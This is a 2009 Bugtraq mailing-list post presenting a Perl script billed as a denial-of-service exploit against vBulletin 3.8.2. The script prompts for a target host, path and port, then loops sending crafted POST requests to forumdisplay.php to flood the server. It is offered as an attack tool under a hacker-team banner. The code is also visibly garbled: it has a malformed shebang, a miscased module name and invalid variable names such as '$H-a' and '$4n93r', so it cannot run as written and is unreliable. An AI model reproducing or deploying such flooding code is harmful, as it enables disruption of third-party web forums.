
Date: Sat, 12 Sep 2009 02:52:23 +0300
From: snip3r ir4Q <iq.submitter@...il.com>
To: bugtraq@...urityfocus.com
Subject: vBulletin 3.8.2 Denial of Service Exploit

#!usr/bin/perl
 #vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t
 #HaCker Anger - Qkk@...mail.Fr
 ########################################################################
 # Modules                                                              #
 ########################################################################
 use IO::SOCKET;           # Object interface                           #
 ########################################################################
 if (@ARGV<1){
 print"
 ########################################################################
 ## Author : Hacker Anger       ##
 ## TeaM : The Assassin Scorpion TeaM              ##
 ## Home : http://Baloma.NeT             ##
 ## Mail : Qkk@...mail.Fr                ##
 ##                                                                    ##
 ########################################################################
 ########################################################################
 ##                                ##                                  ##
 ##->vBulletin 3.8.2 Denial of Service Exploit<-    ##
                 ##
 ##                                ##                                  ##
 ##Enter These Exploit              ##                                  ##
 ##1.Target                        ##[*] www.Baloma.net                ##
 ##2.Forum                         ##[*] vbulletin                     ##
 ##3.Exploit                 ##[*] forumdisplay.php?f=           ##
 ##4.Execution length/timeout      ##[*] 7777777777777777              ##
 ##5.Port                          ##[*] 80                            ##
 ########################################################################
 \a";}
 $anger_Block = "
 ########################################################################";
 $Hacker = "Error!Error!Error!Error";
 $H-a =0;
     print"$anger_Block\n";
     print q(Target->);
     chomp($H-zi3l =<STDIN>);
     if ($H-zi3l eq""){
     die "$Hacker\a\n";}
     print"$anger_Block\n";
       print"$anger_Block\n";
       print q(Path->);
       chomp($H4ck3r_4n93r =<STDIN>);
       if ($H4ck3r_4n93r eq "") {
       die "$Hacker !\a\n";}
       print"$anger_Block\n";
          print"$anger_Block\n";
          print "Vulnerability\n";
          print"forumdisplay.php?f=\n";
          print"->\n";
            chomp($Exploit =<STDIN>);
            if ($Exploit eq "") {
            die "$Hacker !\a\n";}
            print"$anger_Block\n";
               print"$anger_Block\n";
               print q(Time->);
               chomp($H-flood =<STDIN>);
               if ($H-flood eq "") {
               die "$Hacker !\a\n";}
                  print"$anger_Block\n";
                  print"$anger_Block\n";
                  print q(Port->);
                  chomp($p0rt =<STDIN>);
                  if ($p0rt eq ""){
                  die "$Hacker \n";}
                  print"$anger_Block\n";
                     print q(Send "start"->);
                     chomp($H-start =<STDIN>);
                     if ($H-start eq "") {
                     die "$Hacker\n";}
 print "$anger_Block\a\n";
 print "[+]Check Data \n";
 print "[*]Check Target   : $H-zi3l\n";
 print "[*]Check Forum  : $H4ck3r_4n93r\n";
 print "[*]Checking Port   : $p0rt\n";
 print "$anger_Block\n";
 if($H-start == 1){
 while($H-a != 0000){
 $H-a++;}
 }elsif ($H-start == start){
 while($H-a != $H-flood)
 {
 $4n93r_postit = "$H-zi3l"."$H4ck3r_4n93r"."$Exploit";
 $4n93r_l = length $4n93r_postit;
 $4n93r = new IO::Socket::INET (
                               PeerAddr => "$H-zi3l",
                               PeerPort => "$p0rt",
                               Proto => "tcp",
                              );

 print $4n93r "POST $H4ck3r_4n93r$Exploit HTTP/1.1\n";
 print $4n93r "Host: $H-zi3l\n";
 print $4n93r "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
 print $4n93r "Referer: $H-zi3l\n";
 print $4n93r "Accept-Language: en-us\n";
 print $4n93r "Content-Type: application/x-www-form-urlencoded\n";
 print $4n93r "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
 print $4n93r "Content-Length: $4n93r_l\n\n";
 print $4n93r "$4n93r_postit\n";
 close($4n93r);
 syswrite STDOUT, "->BLACKOUT<-";
 $H-a++;
 }
 }else{
 die "Error - can't connect to target $H-zi3l !\n";
 }
